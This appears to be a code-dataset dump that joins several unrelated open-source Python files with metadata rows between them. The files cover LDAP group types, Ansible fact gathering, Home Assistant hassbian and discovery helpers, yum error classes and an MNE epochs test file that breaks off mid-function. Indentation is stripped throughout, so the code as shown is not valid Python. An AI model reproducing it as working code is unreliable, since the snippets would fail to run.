An LDAPGroupType subclass that handles Active Directory groups with nested
group references.
"""
def __init__(self, name_attr='cn'):
super(NestedActiveDirectoryGroupType, self).__init__('member', name_attr)
class OrganizationalRoleGroupType(MemberDNGroupType):
"""
An LDAPGroupType subclass that handles groups of class organizationalRole.
"""
def __init__(self, name_attr='cn'):
super(OrganizationalRoleGroupType, self).__init__('roleOccupant', name_attr)
class NestedOrganizationalRoleGroupType(NestedMemberDNGroupType):
"""
An LDAPGroupType subclass that handles groups of class OrganizationalRoleGroupType
with nested group references.
"""
def __init__(self, name_attr='cn'):
super(NestedOrganizationalRoleGroupType, self).__init__('roleOccupant', name_attr)
| bsd-2-clause | 4,442,355,700,673,920,000 | 35.388535 | 117 | 0.616051 | false |
wrouesnel/ansible | lib/ansible/module_utils/facts/compat.py | 23 | 4115 | # This code is part of Ansible, but is an independent component.
# This particular file snippet, and this file snippet only, is BSD licensed.
# Modules you write using this snippet, which is embedded dynamically by Ansible
# still belong to the author of the module, and may assign their own license
# to the complete work.
#
# (c) 2017 Red Hat Inc.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.module_utils.facts.namespace import PrefixFactNamespace
from ansible.module_utils.facts import default_collectors
from ansible.module_utils.facts import ansible_collector
def get_all_facts(module):
'''compat api for ansible 2.2/2.3 module_utils.facts.get_all_facts method
Expects module to be an instance of AnsibleModule, with a 'gather_subset' param.
returns a dict mapping the bare fact name ('default_ipv4' with no 'ansible_' namespace) to
the fact value.'''
gather_subset = module.params['gather_subset']
return ansible_facts(module, gather_subset=gather_subset)
def ansible_facts(module, gather_subset=None):
'''Compat api for ansible 2.0/2.2/2.3 module_utils.facts.ansible_facts method
2.3/2.3 expects a gather_subset arg.
2.0/2.1 does not except a gather_subset arg
So make gather_subsets an optional arg, defaulting to configured DEFAULT_GATHER_TIMEOUT
'module' should be an instance of an AnsibleModule.
returns a dict mapping the bare fact name ('default_ipv4' with no 'ansible_' namespace) to
the fact value.
'''
gather_subset = gather_subset or module.params.get('gather_subset', ['all'])
gather_timeout = module.params.get('gather_timeout', 10)
filter_spec = module.params.get('filter', '*')
minimal_gather_subset = frozenset(['apparmor', 'caps', 'cmdline', 'date_time',
'distribution', 'dns', 'env', 'fips', 'local', 'lsb',
'pkg_mgr', 'platform', 'python', 'selinux',
'service_mgr', 'ssh_pub_keys', 'user'])
all_collector_classes = default_collectors.collectors
# don't add a prefix
namespace = PrefixFactNamespace(namespace_name='ansible', prefix='')
fact_collector = \
ansible_collector.get_ansible_collector(all_collector_classes=all_collector_classes,
namespace=namespace,
filter_spec=filter_spec,
gather_subset=gather_subset,
gather_timeout=gather_timeout,
minimal_gather_subset=minimal_gather_subset)
facts_dict = fact_collector.collect(module=module)
return facts_dict
| gpl-3.0 | -4,557,754,301,573,688,000 | 46.298851 | 94 | 0.681896 | false |
miniconfig/home-assistant | homeassistant/components/config/hassbian.py | 9 | 2472 | """Component to interact with Hassbian tools."""
import asyncio
import json
import os
from homeassistant.components.http import HomeAssistantView
_TEST_OUTPUT = """
{
"suites":{
"libcec":{
"state":"Uninstalled",
"description":"Installs the libcec package for controlling CEC devices from this Pi"
},
"mosquitto":{
"state":"failed",
"description":"Installs the Mosquitto package for setting up a local MQTT server"
},
"openzwave":{
"state":"Uninstalled",
"description":"Installs the Open Z-wave package for setting up your zwave network"
},
"samba":{
"state":"installing",
"description":"Installs the samba package for sharing the hassbian configuration files over the Pi's network."
}
}
}
""" # noqa
@asyncio.coroutine
def async_setup(hass):
"""Setup the hassbian config."""
# Test if is hassbian
test_mode = 'FORCE_HASSBIAN' in os.environ
is_hassbian = test_mode
if not is_hassbian:
return False
hass.http.register_view(HassbianSuitesView(test_mode))
hass.http.register_view(HassbianSuiteInstallView(test_mode))
return True
@asyncio.coroutine
def hassbian_status(hass, test_mode=False):
"""Query for the Hassbian status."""
# fetch real output when not in test mode
if test_mode:
return json.loads(_TEST_OUTPUT)
raise Exception('Real mode not implemented yet.')
class HassbianSuitesView(HomeAssistantView):
"""Hassbian packages endpoint."""
url = '/api/config/hassbian/suites'
name = 'api:config:hassbian:suites'
def __init__(self, test_mode):
"""Initialize suites view."""
self._test_mode = test_mode
@asyncio.coroutine
def get(self, request):
"""Request suite status."""
inp = yield from hassbian_status(request.app['hass'], self._test_mode)
return self.json(inp['suites'])
class HassbianSuiteInstallView(HomeAssistantView):
"""Hassbian packages endpoint."""
url = '/api/config/hassbian/suites/{suite}/install'
name = 'api:config:hassbian:suite'
def __init__(self, test_mode):
"""Initialize suite view."""
self._test_mode = test_mode
@asyncio.coroutine
def post(self, request, suite):
"""Request suite status."""
# do real install if not in test mode
return self.json({"status": "ok"})
| mit | 2,375,142,109,037,028,000 | 26.164835 | 122 | 0.62945 | false |
pnasrat/yum | yum/Errors.py | 1 | 4097 | #!/usr/bin/python -tt
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# Copyright 2004 Duke University
"""
Exceptions and Errors thrown by yum.
"""
from i18n import to_unicode, to_utf8
class YumBaseError(Exception):
"""
Base Yum Error. All other Errors thrown by yum should inherit from
this.
"""
def __init__(self, value=None):
Exception.__init__(self)
self.value = value
def __str__(self):
return "%s" % to_utf8(self.value)
def __unicode__(self):
return '%s' % to_unicode(self.value)
class YumGPGCheckError(YumBaseError):
pass
class YumDownloadError(YumBaseError):
pass
class YumTestTransactionError(YumBaseError):
pass
class YumRPMCheckError(YumBaseError):
pass
class YumRPMTransError(YumBaseError):
""" This class means rpm's .ts.run() returned known errors. We are compat.
with YumBaseError in that we print nicely, and compat. with traditional
usage of this error from runTransaction(). """
def __init__(self, msg, errors):
self.msg = msg
self.errors = errors
# old YumBaseError raises from runTransaction used to raise just this
self.value = self.errors
def __str__(self):
return "%s" %(self.msg,)
def __unicode__(self):
return '%s' % to_unicode(self.msg)
class LockError(YumBaseError):
def __init__(self, errno, msg, pid=0):
YumBaseError.__init__(self, msg)
self.errno = errno
self.msg = msg
self.pid = pid
class DepError(YumBaseError):
pass
class RepoError(YumBaseError):
pass
class DuplicateRepoError(RepoError):
pass
# Have our own custom .value with all the mirror errors.
class NoMoreMirrorsRepoError(RepoError):
def __init__(self, value=None, errors=None):
Exception.__init__(self)
self._value = value
self.errors = errors
@property
def value(self):
ret = self._value
for url, msg in self.errors or []:
ret += '\n%s: %s' % (url, msg)
return ret
class ConfigError(YumBaseError):
pass
class MiscError(YumBaseError):
pass
class GroupsError(YumBaseError):
pass
class InstallError(YumBaseError):
pass
class UpdateError(YumBaseError):
pass
class RemoveError(YumBaseError):
pass
class ReinstallError(YumBaseError):
pass
class ReinstallRemoveError(ReinstallError):
pass
class ReinstallInstallError(ReinstallError):
def __init__(self, value=None, failed_pkgs=[]):
ReinstallError.__init__(self, value)
self.failed_pkgs = failed_pkgs
class DowngradeError(YumBaseError):
pass
class RepoMDError(YumBaseError):
pass
class PackageSackError(YumBaseError):
pass
class RpmDBError(YumBaseError):
pass
class CompsException(YumBaseError):
pass
class MediaError(YumBaseError):
pass
class PkgTagsError(YumBaseError):
pass
class YumDeprecationWarning(DeprecationWarning):
"""
Used to mark a method as deprecated.
"""
def __init__(self, value=None):
DeprecationWarning.__init__(self, value)
class YumFutureDeprecationWarning(YumDeprecationWarning):
"""
Used to mark a method as deprecated. Unlike YumDeprecationWarning,
YumFutureDeprecationWarnings will not be shown on the console.
"""
def __init__(self, value=None):
YumDeprecationWarning.__init__(self, value)
| gpl-2.0 | 8,602,026,957,233,051,000 | 24.767296 | 79 | 0.675372 | false |
postlund/home-assistant | homeassistant/helpers/discovery.py | 2 | 5724 | """Helper methods to help with platform discovery.
There are two different types of discoveries that can be fired/listened for.
- listen/discover is for services. These are targeted at a component.
- listen_platform/discover_platform is for platforms. These are used by
components to allow discovery of their platforms.
"""
from typing import Callable, Collection, Union
from homeassistant import core, setup
from homeassistant.const import ATTR_DISCOVERED, ATTR_SERVICE, EVENT_PLATFORM_DISCOVERED
from homeassistant.exceptions import HomeAssistantError
from homeassistant.loader import DEPENDENCY_BLACKLIST, bind_hass
from homeassistant.util.async_ import run_callback_threadsafe
# mypy: allow-untyped-defs, no-check-untyped-defs
EVENT_LOAD_PLATFORM = "load_platform.{}"
ATTR_PLATFORM = "platform"
@bind_hass
def listen(
hass: core.HomeAssistant, service: Union[str, Collection[str]], callback: Callable
) -> None:
"""Set up listener for discovery of specific service.
Service can be a string or a list/tuple.
"""
run_callback_threadsafe(hass.loop, async_listen, hass, service, callback).result()
@core.callback
@bind_hass
def async_listen(
hass: core.HomeAssistant, service: Union[str, Collection[str]], callback: Callable
) -> None:
"""Set up listener for discovery of specific service.
Service can be a string or a list/tuple.
"""
if isinstance(service, str):
service = (service,)
else:
service = tuple(service)
@core.callback
def discovery_event_listener(event: core.Event) -> None:
"""Listen for discovery events."""
if ATTR_SERVICE in event.data and event.data[ATTR_SERVICE] in service:
hass.async_add_job(
callback, event.data[ATTR_SERVICE], event.data.get(ATTR_DISCOVERED)
)
hass.bus.async_listen(EVENT_PLATFORM_DISCOVERED, discovery_event_listener)
@bind_hass
def discover(hass, service, discovered, component, hass_config):
"""Fire discovery event. Can ensure a component is loaded."""
hass.add_job(async_discover(hass, service, discovered, component, hass_config))
@bind_hass
async def async_discover(hass, service, discovered, component, hass_config):
"""Fire discovery event. Can ensure a component is loaded."""
if component in DEPENDENCY_BLACKLIST:
raise HomeAssistantError(f"Cannot discover the {component} component.")
if component is not None and component not in hass.config.components:
await setup.async_setup_component(hass, component, hass_config)
data = {ATTR_SERVICE: service}
if discovered is not None:
data[ATTR_DISCOVERED] = discovered
hass.bus.async_fire(EVENT_PLATFORM_DISCOVERED, data)
@bind_hass
def listen_platform(
hass: core.HomeAssistant, component: str, callback: Callable
) -> None:
"""Register a platform loader listener."""
run_callback_threadsafe(
hass.loop, async_listen_platform, hass, component, callback
).result()
@bind_hass
def async_listen_platform(
hass: core.HomeAssistant, component: str, callback: Callable
) -> None:
"""Register a platform loader listener.
This method must be run in the event loop.
"""
service = EVENT_LOAD_PLATFORM.format(component)
@core.callback
def discovery_platform_listener(event: core.Event) -> None:
"""Listen for platform discovery events."""
if event.data.get(ATTR_SERVICE) != service:
return
platform = event.data.get(ATTR_PLATFORM)
if not platform:
return
hass.async_run_job(callback, platform, event.data.get(ATTR_DISCOVERED))
hass.bus.async_listen(EVENT_PLATFORM_DISCOVERED, discovery_platform_listener)
@bind_hass
def load_platform(hass, component, platform, discovered, hass_config):
"""Load a component and platform dynamically.
Target components will be loaded and an EVENT_PLATFORM_DISCOVERED will be
fired to load the platform. The event will contain:
{ ATTR_SERVICE = EVENT_LOAD_PLATFORM + '.' + <<component>>
ATTR_PLATFORM = <<platform>>
ATTR_DISCOVERED = <<discovery info>> }
Use `listen_platform` to register a callback for these events.
"""
hass.add_job(
async_load_platform(hass, component, platform, discovered, hass_config)
)
@bind_hass
async def async_load_platform(hass, component, platform, discovered, hass_config):
"""Load a component and platform dynamically.
Target components will be loaded and an EVENT_PLATFORM_DISCOVERED will be
fired to load the platform. The event will contain:
{ ATTR_SERVICE = EVENT_LOAD_PLATFORM + '.' + <<component>>
ATTR_PLATFORM = <<platform>>
ATTR_DISCOVERED = <<discovery info>> }
Use `listen_platform` to register a callback for these events.
Warning: Do not await this inside a setup method to avoid a dead lock.
Use `hass.async_create_task(async_load_platform(..))` instead.
This method is a coroutine.
"""
assert hass_config, "You need to pass in the real hass config"
if component in DEPENDENCY_BLACKLIST:
raise HomeAssistantError(f"Cannot discover the {component} component.")
setup_success = True
if component not in hass.config.components:
setup_success = await setup.async_setup_component(hass, component, hass_config)
# No need to fire event if we could not set up component
if not setup_success:
return
data = {
ATTR_SERVICE: EVENT_LOAD_PLATFORM.format(component),
ATTR_PLATFORM: platform,
}
if discovered is not None:
data[ATTR_DISCOVERED] = discovered
hass.bus.async_fire(EVENT_PLATFORM_DISCOVERED, data)
| apache-2.0 | 8,365,989,192,857,045,000 | 32.086705 | 88 | 0.698812 | false |
nicproulx/mne-python | mne/tests/test_epochs.py | 2 | 91453 | # Author: Alexandre Gramfort <[email protected]>
# Denis Engemann <[email protected]>
#
# License: BSD (3-clause)
import os.path as op
from copy import deepcopy
from nose.tools import (assert_true, assert_equal, assert_raises,
assert_not_equal)
from numpy.testing import (assert_array_equal, assert_array_almost_equal,
assert_allclose)
import numpy as np
import copy as cp
import warnings
from scipy import fftpack
import matplotlib
from mne import (Epochs, Annotations, read_events, pick_events, read_epochs,
equalize_channels, pick_types, pick_channels, read_evokeds,
write_evokeds, create_info, make_fixed_length_events,
combine_evoked)
from mne.baseline import rescale
from mne.preprocessing import maxwell_filter
from mne.epochs import (
bootstrap, equalize_epoch_counts, combine_event_ids, add_channels_epochs,
EpochsArray, concatenate_epochs, BaseEpochs, average_movements)
from mne.utils import (_TempDir, requires_pandas, slow_test,
run_tests_if_main, requires_version)
from mne.chpi import read_head_pos, head_pos_to_trans_rot_t
from mne.io import RawArray, read_raw_fif
from mne.io.proj import _has_eeg_average_ref_proj
from mne.event import merge_events
from mne.io.constants import FIFF
from mne.externals.six import text_type
from mne.externals.six.moves import zip, cPickle as pickle
from mne.datasets import testing
from mne.tests.common import assert_meg_snr, assert_naming
matplotlib.use('Agg') # for testing don't use X server
warnings.simplefilter('always') # enable b/c these tests throw warnings
data_path = testing.data_path(download=False)
fname_raw_move = op.join(data_path, 'SSS', 'test_move_anon_raw.fif')
fname_raw_movecomp_sss = op.join(
data_path, 'SSS', 'test_move_anon_movecomp_raw_sss.fif')
fname_raw_move_pos = op.join(data_path, 'SSS', 'test_move_anon_raw.pos')
base_dir = op.join(op.dirname(__file__), '..', 'io', 'tests', 'data')
raw_fname = op.join(base_dir, 'test_raw.fif')
event_name = op.join(base_dir, 'test-eve.fif')
evoked_nf_name = op.join(base_dir, 'test-nf-ave.fif')
event_id, tmin, tmax = 1, -0.2, 0.5
event_id_2 = np.int64(2) # to test non Python int types
rng = np.random.RandomState(42)
def _get_data(preload=False):
"""Get data."""
raw = read_raw_fif(raw_fname, preload=preload)
events = read_events(event_name)
picks = pick_types(raw.info, meg=True, eeg=True, stim=True,
ecg=True, eog=True, include=['STI 014'],
exclude='bads')
return raw, events, picks
reject = dict(grad=1000e-12, mag=4e-12, eeg=80e-6, eog=150e-6)
flat = dict(grad=1e-15, mag=1e-15)
def test_hierarchical():
"""Test hierarchical access."""
raw, events, picks = _get_data()
event_id = {'a/1': 1, 'a/2': 2, 'b/1': 3, 'b/2': 4}
epochs = Epochs(raw, events, event_id, preload=True)
epochs_a1 = epochs['a/1']
epochs_a2 = epochs['a/2']
epochs_b1 = epochs['b/1']
epochs_b2 = epochs['b/2']
epochs_a = epochs['a']
assert_equal(len(epochs_a), len(epochs_a1) + len(epochs_a2))
epochs_b = epochs['b']
assert_equal(len(epochs_b), len(epochs_b1) + len(epochs_b2))
epochs_1 = epochs['1']
assert_equal(len(epochs_1), len(epochs_a1) + len(epochs_b1))
epochs_2 = epochs['2']
assert_equal(len(epochs_2), len(epochs_a2) + len(epochs_b2))
epochs_all = epochs[('1', '2')]
assert_equal(len(epochs), len(epochs_all))
assert_array_equal(epochs.get_data(), epochs_all.get_data())
@slow_test
@testing.requires_testing_data
def test_average_movements():
"""Test movement averaging algorithm."""
# usable data
crop = 0., 10.
origin = (0., 0., 0.04)
raw = read_raw_fif(fname_raw_move, allow_maxshield='yes')
raw.info['bads'] += ['MEG2443'] # mark some bad MEG channel
raw.crop(*crop).load_data()
raw.filter(None, 20)
events = make_fixed_length_events(raw, event_id)
picks = pick_types(raw.info, meg=True, eeg=True, stim=True,
ecg=True, eog=True, exclude=())
epochs = Epochs(raw, events, event_id, tmin, tmax, picks=picks, proj=False,
preload=True)
epochs_proj = Epochs(raw, events[:1], event_id, tmin, tmax, picks=picks,
proj=True, preload=True)
raw_sss_stat = maxwell_filter(raw, origin=origin, regularize=None,
bad_condition='ignore')
del raw
epochs_sss_stat = Epochs(raw_sss_stat, events, event_id, tmin, tmax,
picks=picks, proj=False)
evoked_sss_stat = epochs_sss_stat.average()
del raw_sss_stat, epochs_sss_stat
head_pos = read_head_pos(fname_raw_move_pos)
trans = epochs.info['dev_head_t']['trans']
head_pos_stat = (np.array([trans[:3, 3]]),
np.array([trans[:3, :3]]),
np.array([0.]))
# SSS-based
assert_raises(TypeError, average_movements, epochs, None)
evoked_move_non = average_movements(epochs, head_pos=head_pos,
weight_all=False, origin=origin)
evoked_move_all = average_movements(epochs, head_pos=head_pos,
weight_all=True, origin=origin)
evoked_stat_all = average_movements(epochs, head_pos=head_pos_stat,
weight_all=True, origin=origin)
evoked_std = epochs.average()
for ev in (evoked_move_non, evoked_move_all, evoked_stat_all):
assert_equal(ev.nave, evoked_std.nave)
assert_equal(len(ev.info['bads']), 0)
# substantial changes to MEG data
for ev in (evoked_move_non, evoked_stat_all):
assert_meg_snr(ev, evoked_std, 0., 0.1)
assert_raises(AssertionError, assert_meg_snr,
ev, evoked_std, 1., 1.)
meg_picks = pick_types(evoked_std.info, meg=True, exclude=())
assert_allclose(evoked_move_non.data[meg_picks],
evoked_move_all.data[meg_picks], atol=1e-20)
# compare to averaged movecomp version (should be fairly similar)
raw_sss = read_raw_fif(fname_raw_movecomp_sss)
raw_sss.crop(*crop).load_data()
raw_sss.filter(None, 20)
picks_sss = pick_types(raw_sss.info, meg=True, eeg=True, stim=True,
ecg=True, eog=True, exclude=())
assert_array_equal(picks, picks_sss)
epochs_sss = Epochs(raw_sss, events, event_id, tmin, tmax,
picks=picks_sss, proj=False)
evoked_sss = epochs_sss.average()
assert_equal(evoked_std.nave, evoked_sss.nave)
# this should break the non-MEG channels
assert_raises(AssertionError, assert_meg_snr,
evoked_sss, evoked_move_all, 0., 0.)
assert_meg_snr(evoked_sss, evoked_move_non, 0.02, 2.6)
assert_meg_snr(evoked_sss, evoked_stat_all, 0.05, 3.2)
# these should be close to numerical precision
assert_allclose(evoked_sss_stat.data, evoked_stat_all.data, atol=1e-20)
# pos[0] > epochs.events[0] uses dev_head_t, so make it equivalent
destination = deepcopy(epochs.info['dev_head_t'])
x = head_pos_to_trans_rot_t(head_pos[1])
epochs.info['dev_head_t']['trans'][:3, :3] = x[1]
epochs.info['dev_head_t']['trans'][:3, 3] = x[0]
assert_raises(AssertionError, assert_allclose,
epochs.info['dev_head_t']['trans'],
destination['trans'])
evoked_miss = average_movements(epochs, head_pos=head_pos[2:],
origin=origin, destination=destination)
assert_allclose(evoked_miss.data, evoked_move_all.data,
atol=1e-20)
assert_allclose(evoked_miss.info['dev_head_t']['trans'],
destination['trans'])
# degenerate cases
destination['to'] = destination['from'] # bad dest
assert_raises(RuntimeError, average_movements, epochs, head_pos,
origin=origin, destination=destination)
assert_raises(TypeError, average_movements, 'foo', head_pos=head_pos)
assert_raises(RuntimeError, average_movements, epochs_proj,
head_pos=head_pos) # prj
def test_reject():
"""Test epochs rejection."""
raw, events, picks = _get_data()
# cull the list just to contain the relevant event
events = events[events[:, 2] == event_id, :]
selection = np.arange(3)
drop_log = [[]] * 3 + [['MEG 2443']] * 4
assert_raises(TypeError, pick_types, raw)
picks_meg = pick_types(raw.info, meg=True, eeg=False)
assert_raises(TypeError, Epochs, raw, events, event_id, tmin, tmax,
picks=picks, preload=False, reject='foo')
assert_raises(ValueError, Epochs, raw, events, event_id, tmin, tmax,
picks=picks_meg, preload=False, reject=dict(eeg=1.))
# this one is okay because it's not actually requesting rejection
Epochs(raw, events, event_id, tmin, tmax, picks=picks_meg,
preload=False, reject=dict(eeg=np.inf))
for val in (None, -1): # protect against older MNE-C types
for kwarg in ('reject', 'flat'):
assert_raises(ValueError, Epochs, raw, events, event_id,
tmin, tmax, picks=picks_meg, preload=False,
**{kwarg: dict(grad=val)})
assert_raises(KeyError, Epochs, raw, events, event_id, tmin, tmax,
picks=picks, preload=False, reject=dict(foo=1.))
data_7 = dict()
keep_idx = [0, 1, 2]
for preload in (True, False):
for proj in (True, False, 'delayed'):
# no rejection
epochs = Epochs(raw, events, event_id, tmin, tmax, picks=picks,
preload=preload)
assert_raises(ValueError, epochs.drop_bad, reject='foo')
epochs.drop_bad()
assert_equal(len(epochs), len(events))
assert_array_equal(epochs.selection, np.arange(len(events)))
assert_array_equal(epochs.drop_log, [[]] * 7)
if proj not in data_7:
data_7[proj] = epochs.get_data()
assert_array_equal(epochs.get_data(), data_7[proj])
# with rejection
epochs = Epochs(raw, events, event_id, tmin, tmax, picks=picks,
reject=reject, preload=preload)
epochs.drop_bad()
assert_equal(len(epochs), len(events) - 4)
assert_array_equal(epochs.selection, selection)
assert_array_equal(epochs.drop_log, drop_log)
assert_array_equal(epochs.get_data(), data_7[proj][keep_idx])
# rejection post-hoc
epochs = Epochs(raw, events, event_id, tmin, tmax, picks=picks,
preload=preload)
epochs.drop_bad()
assert_equal(len(epochs), len(events))
assert_array_equal(epochs.get_data(), data_7[proj])
epochs.drop_bad(reject)
assert_equal(len(epochs), len(events) - 4)
assert_equal(len(epochs), len(epochs.get_data()))
assert_array_equal(epochs.selection, selection)
assert_array_equal(epochs.drop_log, drop_log)
assert_array_equal(epochs.get_data(), data_7[proj][keep_idx])
# rejection twice
reject_part = dict(grad=1100e-12, mag=4e-12, eeg=80e-6, eog=150e-6)
epochs = Epochs(raw, events, event_id, tmin, tmax, picks=picks,
reject=reject_part, preload=preload)
epochs.drop_bad()
assert_equal(len(epochs), len(events) - 1)
epochs.drop_bad(reject)
assert_equal(len(epochs), len(events) - 4)
assert_array_equal(epochs.selection, selection)
assert_array_equal(epochs.drop_log, drop_log)
assert_array_equal(epochs.get_data(), data_7[proj][keep_idx])
# ensure that thresholds must become more stringent, not less
assert_raises(ValueError, epochs.drop_bad, reject_part)
assert_equal(len(epochs), len(events) - 4)
assert_array_equal(epochs.get_data(), data_7[proj][keep_idx])
epochs.drop_bad(flat=dict(mag=1.))
assert_equal(len(epochs), 0)
assert_raises(ValueError, epochs.drop_bad,
flat=dict(mag=0.))
# rejection of subset of trials (ensure array ownership)
reject_part = dict(grad=1100e-12, mag=4e-12, eeg=80e-6, eog=150e-6)
epochs = Epochs(raw, events, event_id, tmin, tmax, picks=picks,
reject=None, preload=preload)
epochs = epochs[:-1]
epochs.drop_bad(reject=reject)
assert_equal(len(epochs), len(events) - 4)
assert_array_equal(epochs.get_data(), data_7[proj][keep_idx])
# rejection on annotations
sfreq = raw.info['sfreq']
onsets = [(event[0] - raw.first_samp) / sfreq for event in
events[::2][:3]]
onsets[0] = onsets[0] + tmin - 0.499 # tmin < 0
onsets[1] = onsets[1] + tmax - 0.001
first_time = (raw.info['meas_date'][0] + raw.info['meas_date'][1] *
0.000001 + raw.first_samp / sfreq)
for orig_time in [None, first_time]:
raw.annotations = Annotations(onsets, [0.5, 0.5, 0.5], 'BAD',
orig_time)
epochs = Epochs(raw, events, event_id, tmin, tmax, picks=[0],
reject=None, preload=preload)
epochs.drop_bad()
assert_equal(len(events) - 3, len(epochs.events))
assert_equal(epochs.drop_log[0][0], 'BAD')
assert_equal(epochs.drop_log[2][0], 'BAD')
assert_equal(epochs.drop_log[4][0], 'BAD')
raw.annotations = None
def test_decim():
"""Test epochs decimation."""
# First with EpochsArray
dec_1, dec_2 = 2, 3
decim = dec_1 * dec_2
n_epochs, n_channels, n_times = 5, 10, 20
sfreq = 1000.
sfreq_new = sfreq / decim
data = rng.randn(n_epochs, n_channels, n_times)
events = np.array([np.arange(n_epochs), [0] * n_epochs, [1] * n_epochs]).T
info = create_info(n_channels, sfreq, 'eeg')
info['lowpass'] = sfreq_new / float(decim)
epochs = EpochsArray(data, info, events)
data_epochs = epochs.copy().decimate(decim).get_data()
data_epochs_2 = epochs.copy().decimate(decim, offset=1).get_data()
data_epochs_3 = epochs.decimate(dec_1).decimate(dec_2).get_data()
assert_array_equal(data_epochs, data[:, :, ::decim])
assert_array_equal(data_epochs_2, data[:, :, 1::decim])
assert_array_equal(data_epochs, data_epochs_3)
# Now let's do it with some real data
raw, events, picks = _get_data()
events = events[events[:, 2] == 1][:2]
raw.load_data().pick_channels([raw.ch_names[pick] for pick in picks[::30]])
raw.info.normalize_proj()
del picks
sfreq_new = raw.info['sfreq'] / decim
raw.info['lowpass'] = sfreq_new / 12. # suppress aliasing warnings
assert_raises(ValueError, epochs.decimate, -1)
assert_raises(ValueError, epochs.decimate, 2, offset=-1)
assert_raises(ValueError, epochs.decimate, 2, offset=2)
for this_offset in range(decim):
epochs = Epochs(raw, events, event_id,
tmin=-this_offset / raw.info['sfreq'], tmax=tmax)
idx_offsets = np.arange(decim) + this_offset
for offset, idx_offset in zip(np.arange(decim), idx_offsets):
expected_times = epochs.times[idx_offset::decim]
expected_data = epochs.get_data()[:, :, idx_offset::decim]
must_have = offset / float(epochs.info['sfreq'])
assert_true(np.isclose(must_have, expected_times).any())
ep_decim = epochs.copy().decimate(decim, offset)
assert_true(np.isclose(must_have, ep_decim.times).any())
assert_allclose(ep_decim.times, expected_times)
assert_allclose(ep_decim.get_data(), expected_data)
assert_equal(ep_decim.info['sfreq'], sfreq_new)
# More complex cases
epochs = Epochs(raw, events, event_id, tmin, tmax)
expected_data = epochs.get_data()[:, :, ::decim]
expected_times = epochs.times[::decim]
for preload in (True, False):
# at init
epochs = Epochs(raw, events, event_id, tmin, tmax, decim=decim,
preload=preload)
assert_allclose(epochs.get_data(), expected_data)
assert_allclose(epochs.get_data(), expected_data)
assert_equal(epochs.info['sfreq'], sfreq_new)
assert_array_equal(epochs.times, expected_times)
# split between init and afterward
epochs = Epochs(raw, events, event_id, tmin, tmax, decim=dec_1,
preload=preload).decimate(dec_2)
assert_allclose(epochs.get_data(), expected_data)
assert_allclose(epochs.get_data(), expected_data)
assert_equal(epochs.info['sfreq'], sfreq_new)
assert_array_equal(epochs.times, expected_times)
epochs = Epochs(raw, events, event_id, tmin, tmax, decim=dec_2,
preload=preload).decimate(dec_1)
assert_allclose(epochs.get_data(), expected_data)
assert_allclose(epochs.get_data(), expected_data)
assert_equal(epochs.info['sfreq'], sfreq_new)
assert_array_equal(epochs.times, expected_times)
# split between init and afterward, with preload in between
epochs = Epochs(raw, events, event_id, tmin, tmax, decim=dec_1,
preload=preload)
epochs.load_data()
epochs = epochs.decimate(dec_2)
assert_allclose(epochs.get_data(), expected_data)
assert_allclose(epochs.get_data(), expected_data)
assert_equal(epochs.info['sfreq'], sfreq_new)
assert_array_equal(epochs.times, expected_times)
epochs = Epochs(raw, events, event_id, tmin, tmax, decim=dec_2,
preload=preload)
epochs.load_data()
epochs = epochs.decimate(dec_1)
assert_allclose(epochs.get_data(), expected_data)
assert_allclose(epochs.get_data(), expected_data)
assert_equal(epochs.info['sfreq'], sfreq_new)
assert_array_equal(epochs.times, expected_times)
# decimate afterward
epochs = Epochs(raw, events, event_id, tmin, tmax,
preload=preload).decimate(decim)
assert_allclose(epochs.get_data(), expected_data)
assert_allclose(epochs.get_data(), expected_data)
assert_equal(epochs.info['sfreq'], sfreq_new)
assert_array_equal(epochs.times, expected_times)
# decimate afterward, with preload in between
epochs = Epochs(raw, events, event_id, tmin, tmax, preload=preload)
epochs.load_data()
epochs.decimate(decim)
assert_allclose(epochs.get_data(), expected_data)
assert_allclose(epochs.get_data(), expected_data)
assert_equal(epochs.info['sfreq'], sfreq_new)
assert_array_equal(epochs.times, expected_times)
def test_base_epochs():
"""Test base epochs class."""
raw = _get_data()[0]
epochs = BaseEpochs(raw.info, None, np.ones((1, 3), int),
event_id, tmin, tmax)
assert_raises(NotImplementedError, epochs.get_data)
# events with non integers
assert_raises(ValueError, BaseEpochs, raw.info, None,
np.ones((1, 3), float), event_id, tmin, tmax)
assert_raises(ValueError, BaseEpochs, raw.info, None,
np.ones((1, 3, 2), int), event_id, tmin, tmax)
@requires_version('scipy', '0.14')
def test_savgol_filter():
"""Test savgol filtering."""
h_freq = 10.
raw, events = _get_data()[:2]
epochs = Epochs(raw, events, event_id, tmin, tmax)
